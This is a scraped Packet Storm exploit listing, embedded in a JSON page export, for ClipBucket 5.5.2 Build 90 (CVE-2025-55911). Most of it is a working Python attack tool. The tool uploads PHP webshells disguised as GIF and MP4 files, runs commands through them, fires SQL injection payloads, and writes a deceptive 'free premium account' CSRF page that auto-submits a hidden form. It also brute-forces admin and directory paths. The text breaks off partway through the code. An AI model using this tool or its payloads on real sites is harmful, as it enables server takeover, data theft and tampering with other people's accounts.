{"id":29325,"date":"2025-12-08T10:42:42","date_gmt":"2025-12-08T10:42:42","guid":{"rendered":"http:\/\/localhost\/?p=29325"},"modified":"2025-12-08T10:42:42","modified_gmt":"2025-12-08T10:42:42","slug":"clipbucket-552-build-90-practical-exploitation-tool","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=29325","title":{"rendered":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool_PACKETSTORM:212539"},"content":{"rendered":"

{“lastseen”:”2025-12-08T16:29:11″,”description”:”An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation. It checks for remote command execution, file upload, SQL injection, local file inclusion, and more. It…”,”published”:”2025-12-08T00:00:00″,”modified”:”2025-12-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Practical Exploitation Tool”,”source”:””,”references”:””,”id”:”PACKETSTORM:212539″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-55911″],”sourceData”:”=============================================================================================================================================\\n | # Title : ClipBucket 5.5.2 Build 90 Practical Exploitation Tool |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/MacWarrior\/clipbucket-v5\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211129\/ \\u0026 \\tCVE-2025-55911\\n \\n [+] Summary : An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation.Key Capabilities\\n \\n 1. Advanced RCE (Remote Code Execution)\\n \\n Multiple PHP shell payloads (c99, WSO-style, reverse shell)\\n \\n Bypass techniques: Double extensions, null byte injection, MIME type spoofing\\n \\n Smart detection: Automatic shell validation and access level assessment\\n \\n Post-exploitation: Auto-commands for system enumeration\\n \\n 2. File Upload Exploitation\\n \\n 6 different payload types with various obfuscation methods\\n \\n Multiple upload endpoints: Standard, AJAX, action-based\\n \\n Response analysis: Smart parsing of upload responses to locate shells\\n \\n Success verification: Automated shell testing with command execution\\n \\n 3. SQL Injection Attacks\\n \\n Comprehensive testing: Union-based, Error-based, Time-based, Blind SQLi\\n \\n Data extraction: Automatic database\/table\/column enumeration\\n \\n Detailed reporting: Complete payload analysis and exploitation examples\\n \\n Multi-endpoint testing: Tests multiple potential injection points\\n \\n 4. Additional Attack Vectors\\n \\n LFI (Local File Inclusion): \/etc\/passwd, config files, PHP filter wrappers\\n \\n Directory brute-forcing: 20-thread concurrent scanning for hidden paths\\n \\n CSRF exploitation: Attack vector identification and PoC generation\\n \\n Admin panel discovery: Common ClipBucket admin paths\\n \\t\\n [+] Usage : * : Save this file as: exploit.php\\n Run: php exploit.php\\n \\t\\n [+] POC :\\t\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n ClipBucket Practical Exploitation Tool\\n \\n \\”\\”\\”\\n import requests\\n import json\\n import time\\n import random\\n import os\\n import sys\\n import re\\n import urllib3\\n from urllib.parse import urlparse\\n \\n # \u062a\u0639\u0637\u064a\u0644 \u062a\u062d\u0630\u064a\u0631\u0627\u062a SSL\\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n class ClipBucketExploiter:\\n def __init__(self, target_url):\\n self.target = target_url.rstrip(‘\/’)\\n self.session = requests.Session()\\n self.session.verify = False\\n self.session.timeout = 10\\n \\n # \u0625\u0639\u062f\u0627\u062f headers\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n ‘Accept’: ‘*\/*’,\\n ‘Accept-Language’: ‘en-US,en;q=0.9’,\\n ‘Content-Type’: ‘application\/x-www-form-urlencoded; charset=UTF-8’,\\n ‘X-Requested-With’: ‘XMLHttpRequest’\\n })\\n \\n self.vulnerabilities = []\\n self.shell_urls = []\\n \\n def print_status(self, message, status=\\”info\\”):\\n \\”\\”\\”\u0637\u0628\u0627\u0639\u0629 \u0631\u0633\u0627\u0644\u0629 \u0628\u0627\u0644\u0644\u0648\u0646 \u0627\u0644\u0645\u0646\u0627\u0633\u0628\\”\\”\\”\\n colors = {\\n \\”info\\”: \\”\\\\033[96m\\”, # \u0623\u0632\u0631\u0642 \u0633\u0645\u0627\u0648\u064a\\n \\”success\\”: \\”\\\\033[92m\\”, # \u0623\u062e\u0636\u0631\\n \\”warning\\”: \\”\\\\033[93m\\”, # \u0623\u0635\u0641\u0631\\n \\”error\\”: \\”\\\\033[91m\\”, # \u0623\u062d\u0645\u0631\\n \\”critical\\”: \\”\\\\033[95m\\” # \u0628\u0646\u0641\u0633\u062c\u064a\\n }\\n color = colors.get(status, \\”\\\\033[97m\\”)\\n print(f\\”{color}[{status.upper()}] {message}\\\\033[0m\\”)\\n \\n def check_clipbucket(self):\\n \\”\\”\\”\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0645\u0627 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0645\u0648\u0642\u0639 \u064a\u0633\u062a\u062e\u062f\u0645 ClipBucket\\”\\”\\”\\n self.print_status(\\”Checking if website uses ClipBucket…\\”, \\”info\\”)\\n \\n try:\\n # \u0641\u062d\u0635 \u0627\u0644\u0635\u0641\u062d\u0629 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629\\n resp = self.session.get(self.target)\\n \\n # \u0639\u0644\u0627\u0645\u0627\u062a ClipBucket\\n indicators = [\\n ‘clipbucket’, ‘CB’, ‘upload.php’, ‘video_upload’,\\n ‘action=upload’, ‘file_uploader’, ‘video-upload’,\\n ‘videobb’, ‘my_videos’, ‘video_manager’\\n ]\\n \\n found = []\\n for indicator in indicators:\\n if indicator.lower() in resp.text.lower():\\n found.append(indicator)\\n \\n if found:\\n self.print_status(f\\”ClipBucket indicators found: {‘, ‘.join(found[:3])}\\”, \\”success\\”)\\n \\n # \u0641\u062d\u0635 upload.php \u0645\u0628\u0627\u0634\u0631\u0629\\n upload_test = f\\”{self.target}\/upload.php\\”\\n try:\\n upload_resp = self.session.get(upload_test, timeout=5)\\n if upload_resp.status_code == 200:\\n self.print_status(\\”upload.php is accessible!\\”, \\”success\\”)\\n return True\\n else:\\n self.print_status(f\\”upload.php returned status: {upload_resp.status_code}\\”, \\”warning\\”)\\n except:\\n self.print_status(\\”upload.php is not accessible\\”, \\”warning\\”)\\n \\n return True\\n else:\\n self.print_status(\\”No clear ClipBucket indicators found\\”, \\”warning\\”)\\n return False\\n \\n except Exception as e:\\n self.print_status(f\\”Connection error: {str(e)}\\”, \\”error\\”)\\n return False\\n \\n def test_upload_endpoint(self):\\n \\”\\”\\”\u0627\u062e\u062a\u0628\u0627\u0631 \u0646\u0642\u0637\u0629 \u0631\u0641\u0639 \u0627\u0644\u0645\u0644\u0641\u0627\u062a\\”\\”\\”\\n self.print_status(\\”Testing upload.php endpoint…\\”, \\”info\\”)\\n \\n upload_url = f\\”{self.target}\/upload.php\\”\\n \\n # \u0627\u062e\u062a\u0628\u0627\u0631 HEAD \u0623\u0648\u0644\u0627\u064b\\n try:\\n head_resp = self.session.head(upload_url, timeout=5)\\n self.print_status(f\\”HEAD request: Status {head_resp.status_code}\\”, \\”info\\”)\\n except:\\n pass\\n \\n # \u0627\u062e\u062a\u0628\u0627\u0631 GET\\n try:\\n get_resp = self.session.get(upload_url, timeout=5)\\n self.print_status(f\\”GET request: Status {get_resp.status_code}, Size: {len(get_resp.text)} chars\\”, \\”info\\”)\\n \\n # \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0639\u0644\u0627\u0645\u0627\u062a \u0646\u0645\u0648\u0630\u062c \u0627\u0644\u0631\u0641\u0639\\n if ‘upload’ in get_resp.text.lower() or ‘file’ in get_resp.text.lower():\\n self.print_status(\\”Upload form detected\\”, \\”success\\”)\\n return True\\n else:\\n self.print_status(\\”No upload form detected in response\\”, \\”warning\\”)\\n return False\\n \\n except Exception as e:\\n self.print_status(f\\”Error testing upload endpoint: {str(e)}\\”, \\”error\\”)\\n return False\\n \\n def exploit_file_upload(self):\\n \\”\\”\\”\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 \u0631\u0641\u0639 \u0627\u0644\u0645\u0644\u0641\u0627\u062a\\”\\”\\”\\n self.print_status(\\”Attempting file upload exploitation…\\”, \\”info\\”)\\n \\n # \u0628\u0627\u064a\u0644\u0648\u062f\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u0629\\n payloads = [\\n {\\n ‘filename’: ‘test.php’,\\n ‘content’: b’\\u003c?php echo \\”VULNERABLE\\”; ?\\u003e’,\\n ‘mime’: ‘application\/x-php’\\n },\\n {\\n ‘filename’: ‘shell.php.gif’,\\n ‘content’: b’GIF89a\\u003c?php system($_GET[\\”cmd\\”]); ?\\u003e’,\\n ‘mime’: ‘image\/gif’\\n },\\n {\\n ‘filename’: ‘exploit.mp4.php’,\\n ‘content’: b’\\\\x00\\\\x00\\\\x00\\\\x18ftypmp42\\\\x00\\\\x00\\\\x00\\\\x00mp42isom\\u003c?php echo shell_exec($_GET[\\”c\\”]); ?\\u003e’,\\n ‘mime’: ‘video\/mp4’\\n }\\n ]\\n \\n for payload in payloads:\\n self.print_status(f\\”Trying payload: {payload[‘filename’]}\\”, \\”info\\”)\\n \\n files = {\\n ‘Filedata’: (payload[‘filename’], payload[‘content’], payload[‘mime’])\\n }\\n \\n data = {\\n ‘title’: ‘Test Video Upload’,\\n ‘collection_id’: ‘1’\\n }\\n \\n try:\\n response = self.session.post(f\\”{self.target}\/upload.php\\”, \\n files=files, \\n data=data,\\n timeout=15)\\n \\n self.print_status(f\\”Response status: {response.status_code}\\”, \\”info\\”)\\n self.print_status(f\\”Response preview: {response.text[:200]}\\”, \\”info\\”)\\n \\n # \u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u0631\u062f\\n if response.status_code == 200:\\n # \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0625\u0634\u0627\u0631\u0627\u062a \u0627\u0644\u0646\u062c\u0627\u062d\\n success_keywords = [‘success’, ‘file_name’, ‘uploaded’, ‘complete’, ‘yes’]\\n for keyword in success_keywords:\\n if keyword in response.text.lower():\\n self.print_status(f\\”Upload successful! Keyword ‘{keyword}’ found\\”, \\”success\\”)\\n \\n # \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0627\u0633\u0645 \u0627\u0644\u0645\u0644\u0641\\n filename = self.extract_filename(response.text)\\n if filename:\\n shell_url = f\\”{self.target}\/temp\/{filename}\\”\\n self.shell_urls.append(shell_url)\\n self.print_status(f\\”Potential shell: {shell_url}\\”, \\”critical\\”)\\n \\n # \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0634\u0644\\n self.test_shell_access(shell_url, payload[‘filename’])\\n return True\\n \\n # \u062a\u062d\u0644\u064a\u0644 JSON\\n try:\\n json_data = json.loads(response.text)\\n if ‘file_name’ in json_data:\\n filename = json_data[‘file_name’]\\n shell_url = f\\”{self.target}\/temp\/{filename}\\”\\n self.shell_urls.append(shell_url)\\n self.print_status(f\\”JSON response – Shell: {shell_url}\\”, \\”critical\\”)\\n return True\\n except:\\n pass\\n \\n except Exception as e:\\n self.print_status(f\\”Upload error: {str(e)}\\”, \\”error\\”)\\n \\n return False\\n \\n def extract_filename(self, response_text):\\n \\”\\”\\”\u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0627\u0633\u0645 \u0627\u0644\u0645\u0644\u0641 \u0645\u0646 \u0627\u0644\u0631\u062f\\”\\”\\”\\n patterns = [\\n r’\\”file_name\\”\\\\s*:\\\\s*\\”([^\\”]+)\\”‘,\\n r\\”‘file_name’\\\\s*:\\\\s*'([^’]+)’\\”,\\n r’file_name[\\”\\\\’]?\\\\s*[:=]\\\\s*[\\”\\\\’]?([a-zA-Z0-9._-]+)’,\\n r’filename[\\”\\\\’]?\\\\s*[:=]\\\\s*[\\”\\\\’]?([a-zA-Z0-9._-]+)’\\n ]\\n \\n for pattern in patterns:\\n matches = re.findall(pattern, response_text)\\n if matches:\\n filename = matches[0]\\n # \u0625\u0636\u0627\u0641\u0629 \u0627\u0645\u062a\u062f\u0627\u062f \u0625\u0630\u0627 \u0644\u0645 \u064a\u0643\u0646 \u0645\u0648\u062c\u0648\u062f\u0627\u064b\\n if ‘.’ not in filename:\\n filename += ‘.mp4’\\n return filename\\n \\n return None\\n \\n def test_shell_access(self, shell_url, original_filename):\\n \\”\\”\\”\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u0634\u0644\\”\\”\\”\\n self.print_status(f\\”Testing shell access: {shell_url}\\”, \\”info\\”)\\n \\n # \u0628\u0646\u0627\u0621 \u0639\u0644\u0649 \u0646\u0648\u0639 \u0627\u0644\u0645\u0644\u0641\\n if ‘.php’ in original_filename.lower():\\n # \u0627\u062e\u062a\u0628\u0627\u0631 PHP shell\\n test_url = f\\”{shell_url}?cmd=echo+CLIPBUCKET_TEST\\”\\n try:\\n response = self.session.get(test_url, timeout=10)\\n if ‘CLIPBUCKET_TEST’ in response.text:\\n self.print_status(\\”PHP shell is ACTIVE!\\”, \\”success\\”)\\n \\n # \u062c\u0644\u0628 \u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645\\n info_url = f\\”{shell_url}?cmd=whoami \\u0026\\u0026 pwd\\”\\n info_response = self.session.get(info_url, timeout=10)\\n self.print_status(f\\”System info: {info_response.text[:100]}\\”, \\”success\\”)\\n \\n # \u062d\u0641\u0638 \u0631\u0627\u0628\u0637 \u0627\u0644\u0634\u0644\\n with open(‘shells_found.txt’, ‘a’) as f:\\n f.write(f\\”{shell_url}\\\\n\\”)\\n f.write(f\\”Test command: {shell_url}?cmd=whoami\\\\n\\”)\\n f.write(f\\”Response: {info_response.text[:200]}\\\\n\\\\n\\”)\\n \\n return True\\n except:\\n pass\\n \\n # \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0644\u0648\u0635\u0648\u0644 \u0627\u0644\u0645\u0628\u0627\u0634\u0631\\n try:\\n direct_response = self.session.get(shell_url, timeout=10)\\n if direct_response.status_code == 200:\\n self.print_status(f\\”File is accessible (status: {direct_response.status_code})\\”, \\”success\\”)\\n return True\\n except:\\n pass\\n \\n self.print_status(\\”Shell access test failed\\”, \\”warning\\”)\\n return False\\n \\n def exploit_csrf(self):\\n \\”\\”\\”\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CSRF\\”\\”\\”\\n self.print_status(\\”Testing for CSRF vulnerability…\\”, \\”info\\”)\\n \\n test_data = {\\n ‘updateVideo’: ‘1’,\\n ‘videoid’: ‘99999’, # ID \u0639\u0627\u0644\u064a \u0644\u062a\u062c\u0646\u0628 \u0627\u0644\u062a\u0623\u062b\u064a\u0631 \u0639\u0644\u0649 \u0641\u064a\u062f\u064a\u0648\u0647\u0627\u062a \u062d\u0642\u064a\u0642\u064a\u0629\\n ‘title’: ‘CSRF Security Test’,\\n ‘desc’: ‘This is a security test for CSRF vulnerability’,\\n ‘tags’: ‘test,security,csrf’\\n }\\n \\n try:\\n response = self.session.post(f\\”{self.target}\/upload.php\\”, data=test_data, timeout=10)\\n \\n self.print_status(f\\”CSRF test response status: {response.status_code}\\”, \\”info\\”)\\n self.print_status(f\\”Response preview: {response.text[:150]}\\”, \\”info\\”)\\n \\n if response.status_code == 200:\\n if ‘valid’ in response.text.lower() or ‘success’ in response.text.lower():\\n self.print_status(\\”CSRF vulnerability CONFIRMED!\\”, \\”success\\”)\\n self.vulnerabilities.append(‘CSRF’)\\n \\n # \u0625\u0646\u0634\u0627\u0621 \u0635\u0641\u062d\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\\n self.create_csrf_exploit_page()\\n return True\\n else:\\n self.print_status(\\”CSRF protection might be enabled\\”, \\”warning\\”)\\n \\n except Exception as e:\\n self.print_status(f\\”CSRF test error: {str(e)}\\”, \\”error\\”)\\n \\n return False\\n \\n def create_csrf_exploit_page(self):\\n \\”\\”\\”\u0625\u0646\u0634\u0627\u0621 \u0635\u0641\u062d\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 CSRF\\”\\”\\”\\n exploit_html = f”’\\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eFree Premium Access\\u003c\/title\\u003e\\n \\u003cstyle\\u003e\\n body {{\\n font-family: Arial, sans-serif;\\n text-align: center;\\n padding: 50px;\\n background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);\\n color: white;\\n }}\\n .container {{\\n background: rgba(255,255,255,0.1);\\n padding: 30px;\\n border-radius: 15px;\\n backdrop-filter: blur(10px);\\n max-width: 600px;\\n margin: 0 auto;\\n }}\\n button {{\\n background: #4CAF50;\\n color: white;\\n padding: 15px 30px;\\n border: none;\\n border-radius: 8px;\\n font-size: 18px;\\n cursor: pointer;\\n margin: 20px;\\n }}\\n button:hover {{\\n background: #45a049;\\n }}\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003e Claim Your Free Premium Account!\\u003c\/h1\\u003e\\n \\u003cp\\u003eClick the button below to activate premium features\\u003c\/p\\u003e\\n \\n \\u003cform id=\\”attack\\” action=\\”{self.target}\/upload.php\\” method=\\”POST\\” style=\\”display:none;\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”updateVideo\\” value=\\”1\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”videoid\\” value=\\”1\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”title\\” value=\\”ACCOUNT HACKED\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”desc\\” value=\\”This account was compromised via CSRF\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”tags\\” value=\\”hacked\\”\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cbutton onclick=\\”launchAttack()\\”\\u003e\\n ACTIVATE NOW\\n \\u003c\/button\\u003e\\n \\n \\u003cscript\\u003e\\n function launchAttack() {{\\n document.getElementById(‘attack’).submit();\\n alert(‘Premium activated!’);\\n }}\\n \\n \/\/ Auto-attack after 5 seconds\\n setTimeout(launchAttack, 5000);\\n \\u003c\/script\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e”’\\n \\n with open(‘csrf_attack.html’, ‘w’, encoding=’utf-8′) as f:\\n f.write(exploit_html)\\n \\n self.print_status(\\”CSRF exploit page created: csrf_attack.html\\”, \\”success\\”)\\n \\n def test_sqli(self):\\n \\”\\”\\”\u0627\u062e\u062a\u0628\u0627\u0631 \u062b\u063a\u0631\u0629 SQL Injection\\”\\”\\”\\n self.print_status(\\”Testing for SQL Injection…\\”, \\”info\\”)\\n \\n test_payloads = [\\n (\\”1′ OR ‘1’=’1\\”, \\”Basic boolean\\”),\\n (\\”1′ AND SLEEP(5)–\\”, \\”Time-based\\”),\\n (\\”1′ UNION SELECT NULL,version()–\\”, \\”Union injection\\”)\\n ]\\n \\n for payload, description in test_payloads:\\n self.print_status(f\\”Testing: {description}\\”, \\”info\\”)\\n \\n test_data = {\\n ‘getForm’: ‘1’,\\n ‘vid’: payload,\\n ‘objId’: ‘test’,\\n ‘title’: ‘SQLi Test’\\n }\\n \\n try:\\n if ‘SLEEP’ in payload:\\n start_time = time.time()\\n response = self.session.post(f\\”{self.target}\/upload.php\\”, data=test_data, timeout=15)\\n elapsed = time.time() – start_time\\n \\n if elapsed \\u003e 4:\\n self.print_status(f\\”Time-based SQLi detected! Delay: {elapsed:.2f} seconds\\”, \\”success\\”)\\n self.vulnerabilities.append(‘SQL Injection (Time-based)’)\\n return True\\n else:\\n response = self.session.post(f\\”{self.target}\/upload.php\\”, data=test_data, timeout=10)\\n \\n error_indicators = [‘sql’, ‘SQL’, ‘mysql’, ‘MySQL’, ‘syntax error’, ‘query’, ‘database’]\\n for indicator in error_indicators:\\n if indicator.lower() in response.text.lower():\\n self.print_status(f\\”Error-based SQLi detected: {indicator}\\”, \\”success\\”)\\n self.vulnerabilities.append(‘SQL Injection (Error-based)’)\\n \\n with open(‘sqli_evidence.txt’, ‘w’) as f:\\n f.write(f\\”Payload: {payload}\\\\n\\”)\\n f.write(f\\”Response:\\\\n{response.text}\\\\n\\”)\\n \\n return True\\n \\n except Exception as e:\\n self.print_status(f\\”SQLi test error: {str(e)}\\”, \\”error\\”)\\n \\n self.print_status(\\”No SQL injection vulnerability detected\\”, \\”warning\\”)\\n return False\\n \\n def find_admin_panel(self):\\n \\”\\”\\”\u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0644\u0648\u062d\u0629 \u0627\u0644\u062a\u062d\u0643\u0645\\”\\”\\”\\n self.print_status(\\”Searching for admin panel…\\”, \\”info\\”)\\n \\n common_paths = [\\n ‘\/admin’,\\n ‘\/admin_area’,\\n ‘\/administrator’,\\n ‘\/admin.php’,\\n ‘\/admin\/login.php’,\\n ‘\/admin\/index.php’,\\n ‘\/dashboard’,\\n ‘\/controlpanel’,\\n ‘\/cp’,\\n ‘\/admincp’,\\n ‘\/cb_admin’,\\n ‘\/clipbucket_admin’,\\n ‘\/admin_dashboard’,\\n ‘\/manage’,\\n ‘\/manager’\\n ]\\n \\n found_panels = []\\n \\n for path in common_paths:\\n url = f\\”{self.target}{path}\\”\\n try:\\n # \u0637\u0644\u0628 HEAD \u0623\u0648\u0644\u0627\u064b (\u0623\u0633\u0631\u0639)\\n head_resp = self.session.head(url, timeout=3, allow_redirects=False)\\n \\n if head_resp.status_code \\u003c 400:\\n # \u0637\u0644\u0628 GET \u0644\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u0645\u062d\u062a\u0648\u0649\\n get_resp = self.session.get(url, timeout=5)\\n \\n # \u062a\u062d\u0642\u0642 \u0645\u0646 \u0623\u0646 \u0627\u0644\u0635\u0641\u062d\u0629 \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0639\u0644\u0627\u0645\u0627\u062a \u0644\u0648\u062d\u0629 \u062a\u062d\u0643\u0645\\n if any(keyword in get_resp.text.lower() for keyword in [‘login’, ‘admin’, ‘dashboard’, ‘control’, ‘manage’, ‘panel’]):\\n self.print_status(f\\”Admin panel found: {url}\\”, \\”success\\”)\\n found_panels.append(url)\\n \\n # \u062d\u0641\u0638 \u0627\u0644\u0645\u062d\u062a\u0648\u0649 \u0644\u0644\u0641\u062d\u0635\\n with open(‘admin_panel_found.txt’, ‘a’) as f:\\n f.write(f\\”URL: {url}\\\\n\\”)\\n f.write(f\\”Status: {get_resp.status_code}\\\\n\\”)\\n f.write(f\\”Size: {len(get_resp.text)} chars\\\\n\\”)\\n f.write(\\”-\\” * 50 + \\”\\\\n\\”)\\n \\n except:\\n continue\\n \\n if found_panels:\\n self.print_status(f\\”Found {len(found_panels)} admin panels\\”, \\”success\\”)\\n return found_panels\\n else:\\n self.print_status(\\”No admin panels found\\”, \\”warning\\”)\\n return []\\n \\n def scan_directories(self):\\n \\”\\”\\”\u0645\u0633\u062d \u0627\u0644\u062f\u0644\u0627\u0626\u0644 \u0627\u0644\u0645\u0647\u0645\u0629\\”\\”\\”\\n self.print_status(\\”Scanning for important directories…\\”, \\”info\\”)\\n \\n directories = [\\n ‘\/uploads’,\\n ‘\/upload’,\\n ‘\/files’,\\n ‘\/temp’,\\n ‘\/tmp’,\\n ‘\/logs’,\\n ‘\/backup’,\\n ‘\/backups’,\\n ‘\/data’,\\n ‘\/database’,\\n ‘\/config’,\\n ‘\/includes’,\\n ‘\/install’,\\n ‘\/upgrade’,\\n ‘\/assets’,\\n ‘\/images’,\\n ‘\/videos’,\\n ‘\/media’\\n ]\\n \\n found_dirs = []\\n \\n for directory in directories:\\n url = f\\”{self.target}{directory}\\”\\n try:\\n response = self.session.head(url, timeout=3)\\n if response.status_code \\u003c 400:\\n self.print_status(f\\”Directory found: {url} (Status: {response.status_code})\\”, \\”success\\”)\\n found_dirs.append(url)\\n except:\\n pass\\n \\n return found_dirs\\n \\n def generate_report(self):\\n \\”\\”\\”\u062a\u0648\u0644\u064a\u062f \u062a\u0642\u0631\u064a\u0631 \u0627\u0644\u0646\u062a\u0627\u0626\u062c\\”\\”\\”\\n self.print_status(\\”\\\\n\\” + \\”=\\”*60, \\”info\\”)\\n self.print_status(\\”EXPLOITATION REPORT\\”, \\”critical\\”)\\n self.print_status(\\”=\\”*60, \\”info\\”)\\n \\n report = []\\n report.append(f\\”Target: {self.target}\\”)\\n report.append(f\\”Scan Time: {time.strftime(‘%Y-%m-%d %H:%M:%S’)}\\”)\\n report.append(\\”\\”)\\n \\n # \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0643\u062a\u0634\u0641\u0629\\n if self.vulnerabilities or self.shell_urls:\\n report.append(\\”VULNERABILITIES FOUND:\\”)\\n report.append(\\”-\\” * 40)\\n \\n for vuln in self.vulnerabilities:\\n report.append(f\\”\u2713 {vuln}\\”)\\n \\n if self.shell_urls:\\n report.append(f\\”\u2713 Remote Code Execution: {len(self.shell_urls)} shells deployed\\”)\\n for i, shell in enumerate(self.shell_urls, 1):\\n report.append(f\\” Shell {i}: {shell}\\”)\\n \\n report.append(\\”\\”)\\n \\n # \u0627\u0644\u062a\u0648\u0635\u064a\u0627\u062a\\n report.append(\\”RECOMMENDATIONS:\\”)\\n report.append(\\”-\\” * 40)\\n if ‘CSRF’ in self.vulnerabilities:\\n report.append(\\”\u2022 Implement CSRF tokens on all forms\\”)\\n if ‘SQL Injection’ in ‘ ‘.join(self.vulnerabilities):\\n report.append(\\”\u2022 Use prepared statements for database queries\\”)\\n if self.shell_urls:\\n report.append(\\”\u2022 Implement strict file upload validation\\”)\\n report.append(\\”\u2022 Disable PHP execution in upload directories\\”)\\n \\n else:\\n report.append(\\”No critical vulnerabilities found\\”)\\n \\n report.append(\\”\\”)\\n report.append(\\”FILES GENERATED:\\”)\\n report.append(\\”-\\” * 40)\\n \\n # \u0639\u0631\u0636 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0645\u0648\u0644\u062f\u0629\\n files_to_check = [‘shells_found.txt’, ‘csrf_attack.html’, \\n ‘admin_panel_found.txt’, ‘sqli_evidence.txt’]\\n \\n for file in files_to_check:\\n if os.path.exists(file):\\n report.append(f\\”\u2022 {file}\\”)\\n \\n # \u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u062a\u0642\u0631\u064a\u0631\\n report_text = \\”\\\\n\\”.join(report)\\n print(\\”\\\\n\\” + report_text)\\n \\n with open(‘exploitation_report.txt’, ‘w’, encoding=’utf-8′) as f:\\n f.write(report_text)\\n \\n self.print_status(\\”\\\\nReport saved to: exploitation_report.txt\\”, \\”success\\”)\\n \\n def run_complete_scan(self):\\n \\”\\”\\”\u062a\u0634\u063a\u064a\u0644 \u0645\u0633\u062d \u0634\u0627\u0645\u0644\\”\\”\\”\\n self.print_status(\\”Starting complete ClipBucket vulnerability scan…\\”, \\”info\\”)\\n \\n # \u0627\u0644\u062e\u0637\u0648\u0629 1: \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 ClipBucket\\n if not self.check_clipbucket():\\n self.print_status(\\”Target doesn’t appear to be ClipBucket. Stopping scan.\\”, \\”error\\”)\\n return\\n \\n # \u0627\u0644\u062e\u0637\u0648\u0629 2: \u0627\u062e\u062a\u0628\u0627\u0631 upload.php\\n if not self.test_upload_endpoint():\\n self.print_status(\\”upload.php not functioning properly\\”, \\”warning\\”)\\n \\n # \u0627\u0644\u062e\u0637\u0648\u0629 3: \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0631\u0641\u0639 \u0627\u0644\u0645\u0644\u0641\u0627\u062a\\n self.exploit_file_upload()\\n \\n # \u0627\u0644\u062e\u0637\u0648\u0629 4: \u0627\u062e\u062a\u0628\u0627\u0631 CSRF\\n self.exploit_csrf()\\n \\n # \u0627\u0644\u062e\u0637\u0648\u0629 5: \u0627\u062e\u062a\u0628\u0627\u0631 SQL Injection\\n self.test_sqli()\\n \\n # \u0627\u0644\u062e\u0637\u0648\u0629 6: \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0644\u0648\u062d\u0629 \u0627\u0644\u062a\u062d\u0643\u0645\\n self.find_admin_panel()\\n \\n # \u0627\u0644\u062e\u0637\u0648\u0629 7: \u0645\u0633\u062d \u0627\u0644\u062f\u0644\u0627\u0626\u0644\\n self.scan_directories()\\n \\n # \u0627\u0644\u062e\u0637\u0648\u0629 8: \u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u0627\u0644\u0646\u0647\u0627\u0626\u064a\\n self.generate_report()\\n \\n def main():\\n \\”\\”\\”\u0627\u0644\u062f\u0627\u0644\u0629 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629\\”\\”\\”\\n print(\\”\\\\033[95m\\” + \\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 